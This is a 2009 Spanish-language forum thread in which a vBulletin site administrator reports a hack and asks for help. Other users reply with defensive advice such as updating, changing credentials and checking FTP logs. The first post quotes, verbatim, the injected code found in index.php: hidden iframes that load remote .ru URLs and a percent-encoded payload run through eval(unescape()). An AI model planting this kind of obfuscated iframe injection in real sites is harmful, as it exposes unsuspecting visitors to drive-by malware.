Urgente: Hackeo de la 3.8.4 !!!

mijack · 2009-08-18T05:27:38-0500

Estimados compañeros,

Me han hackeado la web !!!

Han introducido un codigo al final del index.php

Insertar CODE, HTML o PHP:

<script language="JavaScript" type="text/javascript">
function getfromDOM(containerid)
{var container = document.getElementById(containerid), element1, element2 = container.firstChild, content ="";
do{element1 = element2; content += element1.firstChild.nodeValue; element2 = element1.nextSibling;}
while(element1!==container.lastChild)
return content;
}
var ff_b = document.createElement("strong");
ff_b.id = "YuPi55";
ff_b.innerHTML="<b>http://000007.ru/in.cgi?7</b>";
ff_b.style.visibility = "hidden";
document.getElementsByTagName("body")[0].appendChild(ff_b);
var ff_iframe = document.createElement("iframe");
ff_iframe.id = "JeT";
ff_iframe.name = "JeT";
ff_iframe.style.visibility = "hidden";
ff_iframe.src=getfromDOM("YuPi55");
document.getElementsByTagName("body")[0].appendChild(ff_iframe);
</script>

y

Insertar CODE, HTML o PHP:

<iframe src="[URL]http://3cy.ru:8080/index.php[/URL]" width=187 height=139 style="visibility: hidden"></iframe<html><body><div id="CFI" style="display:none">%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%30%30%30%30%30%37%2e%72%75%2f%69%6e%2e%63%67%69%3f%37%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</div><script>var nJQ=eval, CFI=document.getElementById("CFI").innerHTML,GaB=unescape;nJQ(GaB(CFI));</script></body></html>>

Tambien me han modificado:

Insertar CODE, HTML o PHP:

[URL="http://www.vbhispano.com/filemanager/filemanager.php?cmd=show&file=login.php&previous_page=filemanager"]login.php[/URL]
[URL="http://www.vbhispano.com/filemanager/filemanager.php?cmd=show&file=payment_gateway.php&previous_page=filemanager"]payment_gateway.php[/URL]
[URL="http://www.vbhispano.com/filemanager/filemanager.php?cmd=show&file=payments.php&previous_page=filemanager"]payments.php[/URL]
[URL="http://www.vbhispano.com/filemanager/filemanager.php?cmd=show&file=usercp.php&previous_page=filemanager"]usercp.php[/URL]
[URL="http://www.vbhispano.com/filemanager/filemanager.php?cmd=show&file=usernote.php&previous_page=filemanager"]usernote.php[/URL]

No se si habrán modificado algún otro archivo

Tengo instalado el 3.84. con el DownloadsII

¿Pueden haber subido un archivo al foro a traves del panel de agestionar archivos adjuntos? ¿o a traves de subir un avatar? ¿a traves del downloadsii? o de donde ??

Como puede comprobar la seguridad de la pagina!?

Gracia a todos

mcloud · 2009-08-18T06:53:35-0500

Suponiendo que tu vBulletin ha sido descargado de la página oficial, cabe la posibilidad de que hayan accedido a través del servidor o de algún hack que hayas instalado.

¿Tu foro es el que tienes puesto en el perfil, el de ortodoncia? Si es así, tienes la versión 3.8.3 y no la 3.8.4

Actualizale y ponte en contacto con tu hosting, a ver si ellos han detectado algo.

mijack · 2009-08-18T07:04:27-0500

Hola,

La pagina en cuestion es www.dentopolis.com y tiene la 3.8.4

Tengo instalado la traudccion en español de vbhispano y downloadsII

Gracias

Carrega · 2009-08-18T08:40:56-0500

ese tipo de intrusión de código suele ser por que o bien te han colado algún archivo mediante el cual tengan acceso a tu ftp o a traves del hosting.

Te recomiendo que cambies todas la claves, tanto de ftp como de BD y de tu panel de hosting y mires en vbulletin en la parte de mantenimiento, diagnostico los posibles archivos modificados para corregirlos.

Por un tiempo no compartiria ni le daria acceso a ningun otro admin.

Si usas cpanel tambien peudes comprobar el log de acceso ftp.

Urgente: Hackeo de la 3.8.4 !!!

mijack Seguir

mcloud

mijack

Carrega